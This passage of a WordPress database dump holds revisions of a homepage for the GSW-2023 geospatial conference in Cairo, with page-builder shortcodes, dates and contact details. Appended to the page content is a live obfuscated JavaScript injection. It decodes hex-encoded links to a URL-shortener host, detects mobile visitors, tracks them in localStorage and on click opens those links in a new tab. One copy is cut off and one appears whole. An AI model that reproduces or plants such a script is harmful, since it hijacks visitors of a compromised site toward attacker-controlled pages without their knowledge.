Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 20:44:52','2022-11-09 20:44:52','',3066,'https://gsw2023.com/?p=3221',0,'revision','',0),
(3222,1,'2022-11-09 20:47:08','2022-11-09 20:47:08','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\r\n<h3></h3>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3220\" img_size=\"500x375\" alignment=\"center\"][/vc_column][vc_column width=\"1/2\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 20:47:08','2022-11-09 20:47:08','',3066,'https://gsw2023.com/?p=3222',0,'revision','',0),
(3223,1,'2022-11-09 20:51:02','2022-11-09 20:51:02','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n<h3 class=\"fancy-title entry-title 